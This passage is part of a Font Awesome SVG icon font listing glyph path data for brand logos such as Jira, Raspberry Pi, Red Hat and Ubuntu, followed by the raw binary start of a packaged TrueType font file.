h-76.3994l-9.7002 -35.5996h31.7998c-22.0996 -90.0996 -22.9004 -89.7998 -23 -104.1c0 -48.7002 63.0996 -56.1006 94.5996 -4.30078l-8.09961 -32.5h45.0996l25.8008 103.301c14.6992 59.6992 74 47.0996 59.8994 0.699219c-9.09961 -32.5996 -40.5996 -106.6 25 -106.6z
" />
    <glyph glyph-name="jira" unicode="&#xf7b1;" horiz-adv-x="496" 
d="M490 206.3c8 -7.89941 8 -20.7002 0 -28.5996c-225.8 -225 137.9 136.3 -241.5 -241.7c-180.7 180.1 -109.7 109.3 -242.5 241.6c-7.90039 8 -7.90039 20.8008 0 28.7002c0 0 77 76.7998 242.5 241.7c72.0996 -71.7998 168.6 -169 241.5 -241.7zM248.5 116.3l76 75.7002
l-76 75.7002l-76 -75.7002z" />
    <glyph glyph-name="mendeley" unicode="&#xf7b3;" horiz-adv-x="640" 
d="M624.6 122.8c23.1006 -22.7002 17.8008 -73.5 0 -88.2998c-36.1992 -38.9004 -100 -18.2002 -104.899 35.2002c-1 11.7002 1.09961 23 5.7002 33c47.2998 103.7 -185.9 106.1 -146.5 8.2002c0.0996094 -0.100586 0.199219 -0.200195 0.299805 -0.400391
c26.5996 -42.5996 -6.7002 -97.2998 -58.7998 -95.2002c-52 -2.2002 -85.6006 52.4004 -58.8008 95.2002c0.100586 0.200195 0.200195 0.299805 0.300781 0.400391c39.3994 97.8994 -193.801 95.5 -146.5 -8.2002c20.3994 -44.9004 -14.1006 -93.7002 -61.2002 -87.7998
c-61.9004 7.7998 -62.5 82.8994 -42.6006 102.6c16 16 31.8008 24.7998 53 22.5c43.3008 1 49.7002 34.9004 37.5 98.7998c-22.6992 57.5 14.5 131.601 87.4004 130.8c76.9004 -0.699219 82.7998 -82 130.9 -82c49.1992 0 53.5 81.3008 130.899 82
c72.5 0.700195 110.2 -73.2998 87.4004 -130.8c-12.2002 -63.8994 -5.7998 -97.7998 37.5 -98.7998c18.7002 2 36.0996 -4.7998 48.3994 -17.2002zM320.7 141.9c43.5996 0 62.7998 37.7998 62.7998 62.7998c0 34.7002 -28.0996 62.7998 -62.7998 62.7998h-0.600586
c-34.5996 0 -62.7998 -28.0996 -62.7998 -62.7998c0 -25.2998 19.4004 -62.7998 62.7998 -62.7998h0.600586z" />
    <glyph glyph-name="raspberry-pi" unicode="&#xf7bb;" horiz-adv-x="406" 
d="M372 215.5c28.7002 -17.2002 54.5996 -72.5996 14 -117.7c-2.59961 -14.0996 -7.09961 -24.2002 -11 -35.3994c-5.90039 -45.2002 -44.4004 -66.3008 -54.5996 -68.8008c-14.9004 -11.1992 -30.7002 -21.7998 -52.2002 -29.1992
c-20.2002 -20.6006 -42.1006 -28.4004 -64.2002 -28.4004h-1c-22 0 -44 7.7998 -64.2998 28.4004c-21.4004 7.39941 -37.2998 18 -52.2002 29.1992c-10.0996 2.5 -48.7002 23.6006 -54.5996 68.8008c-3.90039 11.1992 -8.40039 21.2998 -11 35.3994
c-40.5 45 -14.6006 100.5 14.1992 117.7l3.7002 6.5c-0.0996094 46.4004 21.4004 65.2998 46.5 79.7002c-7.59961 2 -15.3994 3.7002 -17.5996 13.2002c-13.1006 3.39941 -15.7998 9.39941 -17.1006 15.7998c-3.39941 2.2998 -14.7998 8.7002 -13.5996 19.7002
c-6.2998 4.39941 -9.90039 10.0996 -8.09961 18.0996c-6.90039 7.5 -8.7002 13.7002 -5.80078 19.4004c-8.2998 10.1992 -4.59961 15.5 -1.09961 20.8994c-6.2002 11.2002 -0.799805 23.2002 16.5 21.2002c6.90039 10.0996 21.9004 7.7998 24.2002 7.7998
c2.5 3.2998 6 6 16.5 4.7002c6.7998 6.09961 14.3994 5.09961 22.2998 2.09961c3.2002 2.5 6.09961 3.40039 8.7002 3.5c5 0.100586 9.2998 -2.89941 13.8994 -4.2998c11.3008 3.60059 13.8008 -1.39941 19.4004 -3.39941c12.2998 2.59961 16.0996 -3 22 -8.90039
l6.90039 0.0996094c18.5996 -10.7998 27.7998 -32.7998 31.0996 -44.0996c3.2998 11.2998 12.5 33.2998 31.0996 44.0996l6.90039 -0.0996094c5.90039 5.90039 9.7002 11.5 22 8.90039c5.5 2.09961 8.09961 7 19.4004 3.39941
c7.09961 2.2002 13.2998 8.10059 22.5996 0.799805c7.90039 2.90039 15.5 4 22.2998 -2.09961c10.5 1.2998 13.9004 -1.5 16.5 -4.7002c2.2998 0 17.2998 2.2998 24.2002 -7.7998c17.2998 2 22.7998 -10 16.5996 -21.2002c3.5 -5.2998 7.2002 -10.5996 -1.09961 -20.8994
c2.90039 -5.7002 1.09961 -11.9004 -5.7998 -19.4004c1.89941 -8 -1.7002 -13.7002 -8.10059 -18.0996c1.2002 -11 -10.1992 -17.4004 -13.5996 -19.7002c-1.2998 -6.40039 -4 -12.5 -17.0996 -15.7998c-2.2002 -9.60059 -10 -11.2002 -17.6006 -13.2002
c25.1006 -14.4004 46.6006 -33.2998 46.5 -79.7002zM349.8 223.5c1.5 48.7002 -36.3994 75.4004 -82.0996 67.9004c-16.7998 -2.80078 80.5996 -86.6006 82.0996 -67.9004zM306.8 130.4c24.5 15.7998 28.9004 51.5996 9.90039 80
c-19 28.3994 -54.2998 38.5996 -78.7998 22.7998s-28.9004 -51.6006 -9.90039 -80c19 -28.4004 54.2998 -38.6006 78.7998 -22.7998zM238.9 418.7c-16.6006 -15.9004 -40.1006 -55.9004 -5.80078 -71.7998c29 23.5 63.6006 40.6992 102 53.5
c-49.2998 -25.1006 -78 -45.3008 -93.6992 -62.6006c8.09961 -31.7002 50 -33.2002 65.3994 -32.2998c-3.09961 1.40039 -5.7998 3.09961 -6.7002 5.7998c3.80078 2.7002 17.5 0.299805 27 5.60059c-3.69922 0.699219 -5.39941 1.39941 -7.09961 4.09961
c9 2.90039 18.7002 5.2998 24.4004 10c-3.10059 0 -6 -0.599609 -10 2.09961c8.09961 4.30078 16.6992 7.7002 23.3994 14.2002c-4.2002 0.100586 -8.7002 0.100586 -10 1.60059c7.40039 4.5 13.6006 9.5 18.7998 15c-5.7998 -0.700195 -8.2998 -0.100586 -9.69922 0.899414
c5.59961 5.60059 12.5996 10.4004 16 17.2998c-4.40039 -1.5 -8.30078 -2.09961 -11.2002 0.100586c1.89941 4.2998 10 6.7002 14.7002 16.5996c-4.60059 -0.399414 -9.40039 -1 -10.4004 0c2.09961 8.5 5.7002 13.2002 9.2998 18.2002
c-9.7998 0.200195 -24.5996 0 -23.8994 0.799805l6 6.10059c-9.5 2.5 -19.3008 -0.400391 -26.4004 -2.60059c-3.2002 2.5 0 5.60059 3.90039 8.7998c-8.10059 -1 -15.5 -2.89941 -22.1006 -5.39941c-3.59961 3.09961 2.2998 6.2998 5.10059 9.39941
c-12.5 -2.2998 -17.8008 -5.59961 -23.1006 -8.89941c-3.7998 3.59961 -0.200195 6.7002 2.40039 9.7998c-9.40039 -3.5 -14.2998 -7.90039 -19.4004 -12.2998c-1.7998 2.2998 -4.39941 4 -1.2002 9.59961c-6.69922 -3.7998 -11.7998 -8.2998 -15.5 -13.2998
c-4.19922 2.59961 -2.5 6.09961 -2.5 9.40039c-7 -5.60059 -11.3994 -11.5 -16.7998 -17.3008c-1.09961 0.800781 -2.09961 3.40039 -2.89941 7.60059zM204.5 304.1c-27.2002 0.700195 -53.4004 -19.8994 -53.4004 -31.7998
c-0.0996094 -14.5996 21.5 -29.3994 53.6006 -29.7998c32.7998 -0.200195 53.7002 11.9004 53.7998 26.9004c0.0996094 16.8994 -29.7998 35 -54 34.6992zM81.5 316.9c9.59961 -5.2002 23.2002 -2.80078 27.2002 -5.60059
c-0.900391 -2.59961 -3.60059 -4.39941 -6.7002 -5.7998c15.4004 -0.900391 57.4004 0.5 65.4004 32.2998c-15.7002 17.2998 -44.4004 37.6006 -93.7002 62.6006c38.3994 -12.8008 73 -30 102 -53.5c34.0996 15.8994 10.5996 55.8994 -6 71.7998
c-0.900391 -4.2002 -1.7998 -6.7998 -2.90039 -7.60059c-5.39941 5.80078 -9.7998 11.7002 -16.7998 17.3008c0 -3.2002 1.59961 -6.80078 -2.5 -9.40039c-3.7002 5 -8.7998 9.5 -15.5 13.2998c3.2002 -5.59961 0.5 -7.2998 -1.2002 -9.59961
c-5.09961 4.39941 -10 8.89941 -19.3994 12.2998c2.59961 -3.09961 6.19922 -6.2002 2.39941 -9.7998c-5.2998 3.2998 -10.5996 6.59961 -23.0996 8.89941c2.7998 -3.09961 8.59961 -6.2998 5.09961 -9.39941c-6.7002 2.5 -14 4.2998 -22.0996 5.39941
c3.7998 -3.19922 7.09961 -6.2998 3.89941 -8.7998c-7.09961 2.2002 -16.8994 5.10059 -26.3994 2.60059l6 -6.10059c0.700195 -0.799805 -14.1006 -0.700195 -23.9004 -0.799805c3.5 -4.90039 7.2002 -9.7002 9.2998 -18.2002c-1 -1 -5.7998 -0.399414 -10.3994 0
c4.7002 -9.89941 12.7998 -12.3994 14.7002 -16.5996c-2.90039 -2.10059 -6.90039 -1.60059 -11.2002 -0.100586c3.2998 -6.89941 10.3994 -11.6992 16 -17.2998c-1.40039 -1 -3.90039 -1.59961 -9.7002 -0.899414c5.2002 -5.5 11.4004 -10.5 18.7998 -15
c-1.2998 -1.60059 -5.7998 -1.5 -10 -1.60059c6.7002 -6.5 15.2998 -9.89941 23.4004 -14.2002c-4 -2.7998 -6.90039 -2.09961 -10 -2.09961c5.7002 -4.7002 15.3994 -7.2002 24.3994 -10c-1.69922 -2.59961 -3.39941 -3.40039 -7.09961 -4.09961zM141.6 292.8
c-45.5996 7.60059 -83.5996 -19.2002 -82.0996 -67.8994c1.5 -18.6006 98.9004 65.0996 82.0996 67.8994zM38.2002 106c21.5996 -9.5 39.0996 105.3 12.5996 98.2998c-43.8994 -24.5996 -36.2998 -79.5 -12.5996 -98.2998zM129.2 7.7998
c14.0996 10.4004 6.39941 45.7002 -10.5 65.7002c-19.4004 22.2002 -44.6006 35.4004 -60.9004 25.5996c-10.8994 -8.19922 -12.8994 -36 2.60059 -63.3994c23 -32.6006 55.5 -35.7998 68.7998 -27.9004zM102.8 127.5c24.4004 -15.7998 59.7002 -5.59961 78.7998 22.7998
c19 28.4004 14.6006 64.2002 -9.89941 80s-59.7998 5.60059 -78.7998 -22.7998s-14.6006 -64.2002 9.89941 -80zM205 -48c28.4004 -0.5 57.7002 24.4004 57.2002 35.4004c-0.100586 11.3994 -32 19.8994 -55.7002 18.8994c-23.5 0.600586 -59.7002 -9.2998 -59.2998 -22
c-0.400391 -8.59961 28.3994 -33.5 57.7998 -32.2998zM263.9 76.9004v0.599609c-0.200195 29.5996 -26.8008 53.5996 -59.4004 53.4004c-32.5996 -0.200195 -59 -24.3008 -58.7998 -54v-0.600586c0.200195 -29.5996 26.7998 -53.5996 59.3994 -53.3994
c32.6006 0.199219 59 24.2998 58.8008 54zM346.1 34.2002c18.4004 23.2002 12.2002 62 1.7002 72.2998c-15.5996 11.9004 -38 -3.2998 -58.8994 -26.5996c-18.3008 -21.1006 -28.4004 -59.6006 -15.1006 -72c12.7002 -9.60059 47 -8.30078 72.2998 26.2998zM369 107.4
c23.7002 18.6992 31.2998 73.5996 -12.5996 98.2998c-26.4004 7 -8.90039 -107.7 12.5996 -98.2998z" />
    <glyph glyph-name="redhat" unicode="&#xf7bc;" horiz-adv-x="512" 
d="M312.4 46.7998c1.2998 -1.2998 3.59961 -5.59961 0.799805 -11.0996c-1.60059 -2.90039 -3.2002 -4.90039 -6.2002 -7.2998c-3.59961 -2.90039 -10.5996 -6.2002 -20.2998 -0.100586c-5.2002 3.2998 -5.5 4.40039 -12.7002 3.40039
c-5.09961 -0.700195 -7.09961 4.5 -5.2998 8.7998c1.89941 4.2998 9.39941 7.7002 18.7998 2.2002c4.2002 -2.5 10.7998 -7.7002 16.5996 -3.10059c2.40039 1.90039 3.80078 3.2002 7.2002 7c0.299805 0.5 0.799805 0.5 1.10059 0.200195zM256 418.3
c141.4 0 256 -114.6 256.3 -255.899c0 -51.3008 -15.0996 -99 -41.0996 -139.101c-34.4004 7.90039 -63.2998 1.5 -77.7002 -4.5c-1.40039 -0.700195 -2.2998 -2.09961 -2.2998 -3.7002c0 -1.89941 1.09961 -2.09961 0.599609 -4.7998
c-0.700195 -3.09961 -4.2002 -6.09961 -13 -8.09961c-17.3994 -3.7998 -28.3994 -21.9004 -34.7002 -27.7998c-6.5 -6.10059 -23.2998 -10.2002 -25.2998 -8.30078c-0.299805 0.300781 -0.299805 0.700195 0.100586 1.2002c2.5 3.2998 11.8994 13.5 17.5996 24.5
c5.2002 9.90039 9.7002 12.7002 16 22.1006c1.90039 2.69922 9 12.5 11.0996 20.0996c2.30078 7.59961 1.5 16.9004 2.40039 20.7998c1.2002 5.60059 6.5 17.7002 6.90039 24.5c0.199219 3.90039 -16.1006 -5.5 -23.9004 -5.5s-15.4004 4.7002 -22.2998 5
c-8.60059 0.400391 -14.1006 -6.59961 -21.9004 -5.39941c-4.39941 0.699219 -8.2002 4.59961 -15.8994 4.89941c-11.1006 0.400391 -24.6006 -6.09961 -49.9004 -5.2998c-24.9004 0.799805 -48 31.5 -51.0996 36.4004c-3.7002 5.69922 -8.2002 5.69922 -13.1006 1.19922
c-4.89941 -4.39941 -11 -0.899414 -12.7002 2.10059c-2.39941 4.2998 -8 14.7998 -16.2998 21.2002c-8.7002 6.7998 -17.5 6.09961 -21.5 5c-10.5 -2.80078 -15.5996 -13.6006 -14.7002 -22.7002c0.900391 -9.2998 5.60059 -13.5 9.5 -17.7998
c6.30078 -7.2002 6.10059 -14.1006 15.8008 -18.2002c5 -2.10059 6.69922 -5.10059 5.2998 -9.10059c-1.2998 -3.5 -6.40039 -4.2998 -9.7998 -4.5c-8.30078 -0.399414 -15.1006 3.5 -15.8008 3.90039c-12 7.59961 -11.1992 22.9004 -30.2998 22.9004
c-3.7998 0 -7.2998 -1 -10.3994 -2.60059c-12.4004 -6.39941 -27 -10.2002 -42.8008 -10.2002h-17.7998c-8.59961 25.7002 -13.2998 53.2002 -13.2998 81.8008c0 141.3 114.6 255.899 256 255.899zM464.2 167.5c5.5 30.5996 -20.2002 53.2002 -63.9004 63.0996
c-2.5 -8.5 -6.09961 -19.3994 -22.0996 -27.5996c-2.40039 -1.2002 -3.2998 0.799805 -2.2002 2.59961c6.09961 10.3008 7.09961 12.9004 8.90039 16.9004c2.5 6 3.7998 14.4004 -1.10059 32c-9.59961 34.5996 -29.7002 80.9004 -44.2998 95.9004
c-14.0996 14.5 -39.5996 18.5996 -62.7002 12.6992c-8.39941 -2.19922 -25.0996 -10.7998 -55.8994 -3.89941c-53.3008 12 -61.2002 -14.7002 -64.3008 -26.2998c-3 -11.6006 -10.3994 -44.7002 -10.3994 -44.7002c-2.40039 -13.5 -5.7002 -36.9004 77.2002 -52.7002
c62.6992 -12 30.8994 -31.7998 55.6992 -48.4004c5.5 -3.59961 0 -6.69922 -6.09961 -7.2998c-16.4004 -1.7002 -77.0996 15.7002 -113.1 36.1006c-29.4004 17.8994 -29.9004 34.0996 -23.2002 47.7998c-44.4004 4.7998 -77.7998 -4.2002 -83.7998 -25.2002
c-10.3008 -36.0996 79.3994 -97.7002 181.6 -128.6c107.2 -32.4004 217.4 -9.80078 229.7 57.5996zM229.6 313c19.9004 0 34.4004 -14.5 6.5 -16.5996c-29.5996 -2.10059 -32.6992 -5.30078 -38.1992 -11.2002c-7.80078 -8.2998 -18.1006 10.7998 -18.1006 10.7998
c-6.2002 1.2998 -13.5996 11.2002 -9.59961 20.5c4 9.2002 11.2998 6.5 13.5996 3.59961c11.4004 -14.0996 19.5 -7.09961 45.7998 -7.09961zM290.7 353.2c27 2.7998 39.5996 -7.7002 39.3994 -14.1006c-0.199219 -7.59961 -13.6992 -13.5 -30.0996 -13.1992
c-5.2998 0.0996094 -10.2998 0.899414 -14.5996 2.09961c-1.2002 0.299805 -1.2002 1.90039 0 2.2002c30.5996 7 15.8994 20.5 -18.3008 15.0996c-1.19922 0 -1.19922 1.2002 -0.5 1.5c5.80078 3 14.3008 5.40039 24.1006 6.40039z" />
    <glyph glyph-name="sketch" unicode="&#xf7c6;" horiz-adv-x="494" 
d="M18.5 285.8l78.9004 105.8l-6.90039 -130.699h-90.5zM387.3 402.3l7.10059 -133.5l-135.7 147.2zM103.2 229.7l122.6 -239.7l-224.899 261.7h91.0996zM105.2 260.9l142.1 154.1l60.4004 -65.5996l81.5 -88.5h-284zM402.5 251.8v-0.0996094h90.9004l-224.801 -261.7z
M406.4 379l87.8994 -118.1h-90.2998l-6.09961 113.399l-0.900391 17.2998zM104.5 354.5l2.59961 47.7998l128.601 13.7002l-135.8 -147.1zM392.2 251.8l-144.9 -283.8l-102.7 200.9l-42.3994 82.8994h290z" />
    <glyph glyph-name="sourcetree" unicode="&#xf7d3;" horiz-adv-x="406" 
d="M406.2 245c-0.100586 -88.0996 -57 -166.1 -140.7 -193.1v-101.601c0 -7.89941 -6.40039 -14.2998 -14.2998 -14.2998h-96.4004c-7.89941 0 -14.2998 6.40039 -14.2998 14.2998v101.7c-83.9004 27.0996 -140.6 105.2 -140.5 193.4
c0.200195 112 91.0996 202.8 203.2 202.6c112.1 0 203 -90.9004 203 -203zM134.6 245c0 -91 137.2 -89.9004 137.301 0c0 90.7998 -137.301 90.7998 -137.301 0z" />
    <glyph glyph-name="suse" unicode="&#xf7d6;" horiz-adv-x="631" 
d="M467.1 345.2c0 1 1 0.799805 0.900391 0.700195c4.2002 -0.600586 92.2002 -13.7002 129.2 -35.3008c12.0996 -6.89941 20.7002 -21.5 34.5 -69.5996c0.700195 -2.7998 -2.7998 -5.09961 -3.60059 -5.7002c-26.8994 -18.7998 -56.7998 -36.5996 -145.199 21.7002
c11.0996 -26.7002 10.6992 -25.0996 11 -25.5c5.39941 -2.7998 56.2998 -28.7002 81.5996 -28.2002c20.4004 0.400391 42.2002 10.4004 50.9004 15.6006c0 0 4.5 2.69922 3.19922 -2.40039c-0.5 -1.90039 -3.2998 -14.5996 -7 -17.7002c-1 -1 -36.5996 -28.3994 -103.1 -28
c-42.7002 1 -76.7998 16.4004 -82.4004 -17.3994c-2.7998 -17.1006 6.10059 -37.5 18.9004 -55.8008h-48.5996c-15.9004 28.4004 -23.1006 68.3008 -79.8008 68.3008c-51.5996 0 -48.3994 -50.7002 -42.6992 -68.3008h-45.9004
c-18.7998 68.8008 -69.2002 98.6006 -102.4 104.301c-74.2998 12.7998 -113 -49.2002 -87 -98.4004c23.1006 -43.5996 81.4004 -44.0996 99.7002 -20.4004c19.2002 25 3.7998 62.9004 -28.5 65.7002c-12.2998 1.10059 -25.2998 -4.59961 -25.5 -16.8994v-0.100586
c0 -10.8994 10 -13.7998 12 -14c7.2998 0.400391 8.90039 1.90039 11.7998 2.40039c5.2002 0.899414 16.8008 -1.7998 16.8008 -13.9004c0 -8.39941 -6.80078 -13.0996 -13.3008 -14.8994c-5.69922 -1.90039 -10.7998 -2.7002 -15.7998 -2.7002
c-17.2002 0 -41.2002 14.7998 -41.5 42.5996c-0.200195 15.7002 7.7002 30 21.6006 39.2002c15.8994 10.5 43.5996 14.0996 69.1992 -1.59961c31.5 -19.3008 39.7002 -57.1006 31.5 -82.9004c-11.8994 -37.2998 -45.5996 -57.2002 -90 -53.2998
c-31.5 2.7998 -60.6992 19.3994 -78.0996 44.3994c-7.7002 11.1006 -13.4004 23.4004 -16.5 35.7002c-7.09961 28.1006 0 58.1006 5.5 71.4004c25.7002 63.5996 80.2002 97.2998 99.5996 109.7c100.2 61.5996 171.101 59.0996 223 57.2998
c61.3008 -2.2002 126.601 -23.2998 135.7 -26.2998c0 2 0.299805 20.2998 0.299805 20.2998zM527.5 272.4c-1.09961 -33.5 39.0996 -51.6006 63.2998 -28.9004c24.4004 22.9004 9 64 -24.3994 65.2002c-21.4004 0.700195 -38.3008 -16.1006 -38.9004 -36.2998zM566.1 297.7
c14.5 -0.600586 25.9004 -12.7002 25.4004 -27.2002c-0.5 -14.2002 -12.4004 -25.7998 -27.2002 -25.2998c-14.5 0.5 -25.7998 12.7002 -25.2998 27.2002c0.400391 14.0996 12.2998 25.7998 27.0996 25.2998zM570.4 268.9c15.3994 0 15.3994 15.5996 0 15.5996
c-15.4004 0 -15.4004 -15.5996 0 -15.5996z" />
    <glyph glyph-name="ubuntu" unicode="&#xf7df;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM300.7 347c-8.7998 -15.2002 -3.60059 -34.7002 11.7002 -43.5996c15.1992 -8.80078 34.6992 -3.5 43.5 11.6992c8.7998 15.3008 3.59961 34.8008 -11.7002 43.6006
c-15.2002 8.7998 -34.7002 3.5 -43.5 -11.7002zM87.4004 160.1c17.5996 0 31.8994 14.3008 31.8994 31.9004s-14.2998 31.9004 -31.8994 31.9004c-17.6006 0 -31.9004 -14.3008 -31.9004 -31.9004s14.2998 -31.9004 31.9004 -31.9004zM115.5 157
c8.7002 -32.7002 29.0996 -60.7002 56.5 -79l23.7002 39.5996c-51.5 36.3008 -51.5 112.5 0 148.801l-23.7002 39.5996c-27.4004 -18.4004 -47.9004 -46.2998 -56.5 -79.0996c22.4004 -18 22.2998 -52 0 -69.9004zM344.2 25.2998
c15.2998 8.7998 20.5 28.2998 11.7002 43.6006c-8.80078 15.2998 -28.3008 20.5 -43.5 11.6992c-15.3008 -8.7998 -20.5 -28.2998 -11.7002 -43.5996s28.2002 -20.5 43.5 -11.7002zM344.5 94.7998c23 22.9004 38 53.9004 40.2998 88.4004l-46.0996 0.700195
c-5.5 -62.7002 -71.9004 -100.9 -128.9 -74.4004l-22.5 -40.2998c47.7998 -23.7002 91.5 -10.7998 96.7002 -9.40039c4.40039 28.4004 33.7998 45.2998 60.5 35zM338.6 200.1l46 0.600586c-2.19922 34.5996 -17.0996 65.5996 -40.1992 88.5
c-26.7002 -10.2998 -56.1006 6.7002 -60.5 35c-5.2002 1.39941 -48.8008 14.2998 -96.7002 -9.40039l22.5 -40.2998c57.5996 26.7998 123.5 -12.4004 128.899 -74.4004z" />
    <glyph glyph-name="ups" unicode="&#xf7e0;" horiz-adv-x="375" 
d="M99.2002 145.4v123h32.5996v-141.601c-17.7002 -12.0996 -97.8994 -35.8994 -97.8994 39v102.601h32.6992v-104c0 -32.1006 27.4004 -22.6006 32.6006 -19zM0 373.6c93.5996 49.6006 259.1 61.6006 375.4 0v-220.899c0 -103.9 -75.3008 -135.2 -187.7 -184.101
c-112.8 48.9004 -187.7 80.4004 -187.7 184.101v220.899zM358.1 152.7v216.2c-109.3 10.1992 -238.6 4 -340.899 -89.8008v-126.399c0 -86.6006 53 -113.5 170.5 -165.3c117.2 51.6992 170.399 78.6992 170.399 165.3zM148.5 260.1
c23.7002 15.3008 104.4 31.8008 104.4 -65.5996c0 -75.9004 -47.3008 -85.7998 -71.7002 -78.5v-68.7002h-32.7002v212.8zM181.2 142.8c2 -0.799805 38.3994 -16.8994 38.3994 51c0 62 -30 53.5 -38.3994 49.2998v-100.3zM260.3 229.2
c-0.200195 41.0996 51.2002 53.8994 79.7002 31.8994v-28.3994c-17.9004 18.2998 -47.9004 18.0996 -48.5 -2.2002c-0.700195 -26.5996 55.0996 -21.7002 53.4004 -73.2002c-1.30078 -41.5996 -47 -55 -83.2002 -33.5v30.1006
c20.3994 -18.1006 51.3994 -18.6006 50.7998 4.89941c-0.599609 27.9004 -52.0996 23.1006 -52.2002 70.4004z" />
    <glyph glyph-name="usps" unicode="&#xf7e1;" horiz-adv-x="522" 
d="M433.3 206.2c-1.39941 -2.2002 -4.2998 -4.40039 -3.7998 0.0996094c2.90039 11.6006 13.9004 30.5 4.40039 32c-17.8008 3.10059 -88.1006 -4.5 -88.1006 0c0 2.40039 26.7002 3.10059 37.9004 8.7002c9.39941 9.40039 10.7998 8 10.8994 8h27
c26.9004 0 37.5 -7.5 11.7002 -48.7998zM321.2 183.6c-62.2998 -21.1992 -124.8 -54.1992 -321.2 -151.5l52.4004 245.5c185 0 335.199 5.60059 337.899 -22.5996h-196.6l30.7002 -93.2998c35 16.7998 120.899 51.7002 172.6 53.8994
c21.7998 0.800781 30.5996 -2.89941 26.2002 -5.7998c-4.7002 -2.2998 -38 -4.89941 -102 -26.2002zM67.7002 351.9h454.3l-67.7002 -319.7h-423.1s402 157.3 406.399 160.2c0 0 35.7002 48 14.6006 67.6992c-6.5 6.60059 -16 6.60059 -52.4004 6.60059
c-2.09961 19.5 -78.7998 31.5 -332.1 85.2002z" />
    <glyph glyph-name="yarn" unicode="&#xf7e3;" horiz-adv-x="496" 
d="M393.9 102.8c-39 -9.2998 -48.4004 -32.0996 -104 -47.3994c0 0 -2.7002 -4 -10.4004 -5.80078c-13.4004 -3.2998 -63.9004 -6 -68.5 -6.09961c-12.4004 -0.0996094 -19.9004 3.2002 -22 8.2002c-6.40039 15.2998 9.2002 22 9.2002 22
c-8.10059 5 -9 9.89941 -9.7998 8.09961c-2.40039 -5.7998 -3.60059 -20.0996 -10.1006 -26.5c-8.7998 -8.89941 -25.5 -5.89941 -35.2998 -0.799805c-10.7998 5.7002 0.799805 19.2002 0.799805 19.2002s-5.7998 -3.40039 -10.5 3.59961
c-6 9.2998 -17.0996 37.2998 11.5 62c-1.2998 10.1006 -4.59961 53.7002 40.6006 85.6006c0 0 -20.6006 22.7998 -12.9004 43.2998c5 13.3994 7 13.2998 8.59961 13.8994c5.7002 2.2002 11.3008 4.60059 15.4004 9.10059c20.5996 22.2002 46.7998 18 46.7998 18
s12.4004 37.7998 23.9004 30.3994c3.5 -2.2998 16.2998 -30.5996 16.2998 -30.5996s13.5996 7.90039 15.0996 5c8.2002 -16 9.2002 -46.5 5.60059 -65.0996c-6.10059 -30.6006 -21.4004 -47.1006 -27.6006 -57.5c-1.39941 -2.40039 16.5 -10 27.8008 -41.3008
c10.3994 -28.5996 1.09961 -52.6992 2.7998 -55.2998c0.799805 -1.39941 13.7002 -0.799805 36.3994 13.2002c12.8008 7.90039 28.1006 16.9004 45.4004 17c16.7002 0.5 17.5996 -19.2002 4.90039 -22.2002zM496 192c0 -136.9 -111.1 -248 -248 -248s-248 111.1 -248 248
s111.1 248 248 248s248 -111.1 248 -248zM416.7 116.8c-1.7002 13.6006 -13.2002 23 -28 22.7998c-22 -0.299805 -40.5 -11.6992 -52.7998 -19.1992c-4.80078 -3 -8.90039 -5.2002 -12.4004 -6.80078c3.09961 44.5 -22.5 73.1006 -28.7002 79.4004
c7.7998 11.2998 18.4004 27.7998 23.4004 53.2002c4.2998 21.7002 3 55.5 -6.90039 74.5c-1.59961 3.09961 -7.39941 11.2002 -21 7.39941c-9.7002 20 -13 22.1006 -15.5996 23.8008c-1.10059 0.699219 -23.6006 16.3994 -41.4004 -28
c-12.2002 -0.900391 -31.2998 -5.30078 -47.5 -22.8008c-2 -2.19922 -5.89941 -3.7998 -10.0996 -5.39941h0.0996094c-8.39941 -3 -12.2998 -9.90039 -16.8994 -22.2998c-6.5 -17.4004 0.199219 -34.6006 6.7998 -45.7002c-17.7998 -15.9004 -37 -39.7998 -35.7002 -82.5
c-34 -36 -11.7998 -73 -5.59961 -79.6006c-1.60059 -11.0996 3.69922 -19.3994 12 -23.7998c12.5996 -6.7002 30.2998 -9.59961 43.8994 -2.7998c4.90039 -5.2002 13.7998 -10.0996 30 -10.0996c6.7998 0 58 2.89941 72.6006 6.5c6.7998 1.59961 11.5 4.5 14.5996 7.09961
c9.7998 3.09961 36.7998 12.2998 62.2002 28.7002c18 11.7002 24.2002 14.2002 37.5996 17.3994c12.9004 3.2002 21 15.1006 19.4004 28.2002z" />
  </font>
</defs></svg>
PK!{�,�,�'fontawesome/webfonts/fa-regular-400.ttfnu&1i�
�PFFTM�qq�GDEF*���OS/2A��X`cmapǠ���gasp����glyfl	 n�head���6hhea5�$hmtx_t�Tloca�Eˈ�6maxp��8 name.05�w�Upost�OA�}<�IyX8s��_<�؈��؈���������������@��LfGLf��PfEd�������.�T�:� ���@��?@����?@��4��@@������`������@���@������������������������@���@�����@����������@��@��@����@�@���������������������������������*����"�$�.�>�D�Y�n�p�s�u�|�����������������������3�D�F�J�N�R�\�e����������������
�I�M�[�]�t�z����������������(�[�������V�g�z������������������"�$�.�>�D�W�n�p�s�u�{�����������������������3�D�F�J�M�P�[�d���������������
�G�M�T�]�q�y���������������(�X�������V�g�y�������������������������������|zwZYB81-(�����������}zpf`USC
�
�
�
�
�
�
�
�
�
�
�
�
�
�
m
H
��g��$
�
�
�
�
�
�
�@|��n��*��b���H�*N�b�b�	^	�

:
�
�:�6��

�N��D��>n�8�(f��L�D�L�l�.l�D��f���Z�h�D��h�  h �!
!J!�!�"f"�#N#�$$j$�$�%%P&B&�'
'P'�'�'�(((l(�)$)�)�*N*�+6+~+�,J,�--�..f//�0,0�1 1�22p2�3�3�4:4�4�5 5�66Z6�77b�����$"/.676>64'&'.7�$�,�$+u**u$O##O$��UN��OT$	**	�W"##"W���1�"/&?'&6?627/7j �� j�A	(	Ad�>>�d||&g�	DD
�g&���b~~b�BB����"*2%2#!"&=46322654&#"#"&#"6"&462&"264:7O��O7
344b3#99#3�xTTxThP88P8�O77O�#33#�TxTTx�8P88P����2"&4264&"'&=4;2�Α�Α��uu�uU C	��Α���u�uu�
>��0

���'3?GOW2#!"&5463254#!"3%+"=4;25+"=4;25+"=4;2"&462"&462"&462��`��lj����������`�pT��\TT	uu���(8276#"&#"+"&5&5466325#"&#"63232P,A+=C%gA?		')%g�E;f9-4Lf9p
�( S		� ��   � ����
2'4634#!"7P�� �����0pp��Tv��T�#.2#!"&5463254#!"362"&457676��`��l9""((xX��� �����""�0((xXP��A�*/7%76#!"&5463!2+!547&?62'7'&76� 
�� �`���Z
0+t:�A�+:g �`
